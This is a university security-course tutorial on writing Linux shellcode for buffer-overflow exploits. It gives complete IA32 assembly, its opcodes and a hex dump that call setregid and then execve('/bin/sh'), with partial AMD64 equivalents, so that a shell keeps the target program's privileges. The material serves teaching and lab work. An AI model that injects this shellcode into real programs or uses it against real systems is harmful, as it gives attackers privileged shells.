# cs4459: Unit3 - Writing Shellcode Tutorial
## Objective
Now we can change the control flow of the program by exploiting a buffer overflow vulnerability. While we could jump into execute_me() because the program contains such function, what should we do if there is no such function?
The answer is, we can write the code that we want to execute, inject it to the program's address space, and then jump on to it.
Then, a following question is, which code do you want to write. If you can put any code in a program's space, then you might want to run the following code:
```c=
execve("/bin/sh", 0, 0); or
system("/bin/sh")
```
Because, if you launch a shell ("/bin/sh", "/bin/bash", or others) from a program, this will give you the power of running any command with the inherited privilege (from the assignment binary, or the program that you want to attack.)
So the code we will write and use in this week is called as `Shellcode` (because it runs a shell!).
## Requirement
To run a shell, what we need to call is:
`execve("/bin/sh", 0, 0)` as a system call (we can call system("/bin/sh"), but we will cover this later).
However, just running the shell will not let you inherit the effective
privilege set by the sticky bits; to this end, you should run the
followings beforehand:
```c=
setregid(getegid(), getegid()) // in case of gid, for our assignments.
setreuid(geteuid(), geteuid()) // in case of uid, for the real attack cases.
```
So our job is to write a code that runs:
```c=
setregid(getegid(), getegid());
execve("/bin/sh", 0, 0);
```
3. System calls
Fortunately, all such calls are not the function call. These functions
are implemented in the OS kernel, and we can call the functions via
system call.
System call is the primary gateway to kernel open to the user's space.
In the IA32 architecture of Linux, this is done by issuing *software
interrupt* at `0x80`:
```asm=
// IA32
int $0x80
/* In the AMD64 architecture,
* this is done by issuing syscall instruction.
*/
// AMD64 assembly
syscall
```
Then, how can we invoke system calls?
## IA32 Syscall
Syscalls are defined by numbers. You can search for the system call numbers at [here][syscalls x86-32_bit].
From the table, we can see that:
```
sys_execve: 0xb
sys_getegid16: 0x32
sys_setregid16: 0x47
```
and these numbers must be set at the `%eax` register before invoking the system call.
For example, running `getegid()` requires:
```asm=
mov $0x32, %eax; // SYS_getegid
int $0x80;
```
The return value of the system call will be stored in the EAX register.
So after running `int $0x80`, the result (effective GID) will be stored in
`%eax`.
Next is, calling `setregid(getegid(), getegid())`.
The syscall has two arguments, and in x86 architecture of Linux,
arguments for the system call is passed in the following way:
```
ebx : 1st argument
ecx : 2nd argument
edx : 3rd argument
esi : 4th argument
edi : 5th argument
```
So to call `setregid(getegid(), getegid())`,
```
eax = 0x47
ebx = egid value
ecx = egid value
```
and we can make this as follows:
```asm=
mov %eax, %ebx // set ebx (1st arg) to the returned egid
mov %eax, %ecx // set ecx (2nd arg) to the returned egid
mov $0x47, %eax // set eax to $SYS_setregid
int $0x80
```
Now we move to `execve("/bin/sh", 0, 0)`.
First, the syscall number is `0xb (11)`. And both 2nd and 3rd arguments
are zero, so we can easily do this by making both `%ecx` and `%edx` to be
zero.
But, what about setting `/bin/sh` for the `%ebx` register? We should
store the memory address that stores the string `/bin/sh` to `%ebx`.
While different options exist, to this end, we will build a string on the stack, because stack is available memory space!
One convenient way to achieve this is using push instruction to push values on the stack.
We will push the following values:
```asm=
push $0 // mark the end of string (NULL)
push $0x68732f6e // push "n/sh"
push $0x69622f2f // push "//bi"
```
Because x86 has *4-byte width* for the values, let me first adjust the
string `/bin/sh` (7 bytes) to `//bin/sh` (8 bytes).
First, we push zero to mark the end of the string. And then, we push
`0x68732f6e`. This is the string value of `n/sh` (in little endian!).
Finally, we push `0x69622f2f`, which is `//bi`.
Consequently, the current stack top will store `//bi`, `n/sh`, `\0`,
which will be concatenated as `//bin/sh\0`.
Then how to make `%ebx` to point that address? The address of the current
stack top is always stored in the `%esp` register. So, just move it.
In the [shellcode-template],
you can edit [shellcode.S] to write the shellcode.
To build the code, you can type:
```bash=
$ make 32
gcc -m32 -c -o shellcode.o shellcode.S &&\
gcc -o shellcode shellcode.o -m32 && \
objcopy -S -O binary -j .text shellcode.o shellcode.bin
for 32-bit x86 shellcode. For 64bit AMD64 shellcode, you can type:
$ make 64
...
```
After building the code, I have put some convenient commands such as:
```bash=
$ make objdump
```
This will show the opcode along with your assembly code:
```
shellcode.o: file format elf32-i386
```
Disassembly of section .text:
```asm=
00000000 <main>:
0: b8 32 00 00 00 mov $0x32,%eax
5: cd 80 int $0x80
7: 89 c3 mov %eax,%ebx
9: 89 c1 mov %eax,%ecx
b: b8 47 00 00 00 mov $0x47,%eax
10: cd 80 int $0x80
12: b8 0b 00 00 00 mov $0xb,%eax
17: b9 00 00 00 00 mov $0x0,%ecx
1c: ba 00 00 00 00 mov $0x0,%edx
21: 6a 00 push $0x0
23: 68 6e 2f 73 68 push $0x68732f6e
28: 68 2f 2f 62 69 push $0x69622f2f
2d: 89 e3 mov %esp,%ebx
2f: cd 80 int $0x80
```
```bash
$ make dump
```
This will just dump the code in hexadecimal values:
```
00000000: b832 0000 00cd 8089 c389 c1b8 4700 0000 .2..........G...
00000010: cd80 b80b 0000 00b9 0000 0000 ba00 0000 ................
00000020: 006a 0068 6e2f 7368 682f 2f62 6989 e3cd .j.hn/shh//bi...
00000030: 80
```
```bash
$ ./shellcode
```
And if you run this, this will actually execute your code
(you should get a new shell with `$` if you coded correctly).
## AMD64 Syscall
Syscalls are defined by numbers. You can search for the system call numbers at [here][syscalls x86-64_bit].
:::warning
NOTE: system call numbers differs for 32-bit and 64-bit!!!
Argument passing is also different!
:::
Finally, run the system call with:
```asm=
// not the int $0x80!
syscall
```
From the table, we can see that:
```
sys_execve: 59
sys_getegid16: 108
sys_setregid16: 114
```
and these numbers must be set at the `%rax` register before invoking the system call.
For example, running `getegid()` requires:
```asm=
mov $108, %rax; // SYS_getegid
syscall;
```
The return value of the system call will be stored in the `%rax` register.
So after running `syscall`, the result (effective GID) will be stored in
`%rax`.
Next is, calling `setregid(getegid(), getegid())`.
The syscall has two arguments, and in the AMD64 architecture of Linux,
arguments for the system call is passed in the following way:
```
rdi : 1st argument
rsi : 2nd argument
rdx : 3rd argument
rcx : 4th argument
r8 : 5th argument
r9 : 6th argument
```
So to call `setregid(getegid(), getegid())`,
```
rax = 114
rdi = egid value
rsi = egid value
```
and we can make this as follows:
```asm=
mov %rax, %rdi // set rdi (1st arg) to the returned egid
mov %rax, %rsi // set rsi (2nd arg) to the returned egid
mov $114, %eax // set rax to $SYS_setregid
syscall
```
Now we move to `execve("/bin/sh", 0, 0)`.
First, the syscall number is `0x3b (59)`. And both 2nd and 3rd arguments
are zero so we can easily do this by making both `%rsi` and `%rdx` to be zero.
And we will put `//bin/sh` on the stack and make `%rdi` to point that.
However, we need to do this in a different way than in x86.
The reason is, there is no 8-byte value push in the AMD64 architecture.
Push can only work with 1, 2, and 4 bytes for the immediate values (register pushes are 8 bytes).
For instance, if you do this:
```asm=
push $0 // mark the end of string (NULL)
push $0x68732f6e // push "n/sh"
push $0x69622f2f // push "//bi"
```
The stack will store:
`0x0000000069622f2f`, `0x0000000068732f6e`, `0x0000000000000000`
So the string will just be `//bi`.
To push an 8 byte value, we need to move it to a register first
and then push the register.
Do this in the following way:
```asm=
mov $0x68732f6e69622f2f, %rbx
push $0
push %rbx
mov %rsp, %rdi
```
In the shellcode-template (you will have this if you ran 'fetch week3'),
you can edit [shellcode.S] to write the shellcode.
To build the code, you can type:
```bash
$ make 64
gcc -m64 -c -o shellcode.o shellcode.S
gcc -o shellcode shellcode.o -m64
objcopy -S -O binary -j .text shellcode.o shellcode.bin
```
[syscalls x86-32_bit]:https://chromium.googlesource.com/chromiumos/docs/+/master/constants/syscalls.md#x86-32_bit "syscalls x86-32_bit"
[syscalls x86-64_bit]:https://chromium.googlesource.com/chromiumos/docs/+/master/constants/syscalls.md#x86_64-64_bit "syscalls x86-64_bit"
[shellcode-template]:https://xfersh.syssec.org/14uYkU/shellcode-template.tar.bz2 "shellcode-template"
[shellcode.S]: https://codimd.syssec.org/s/KBb3so5cp "shellcode.S"
---
###### tags: `candl`,`cs4459`,`shellcode`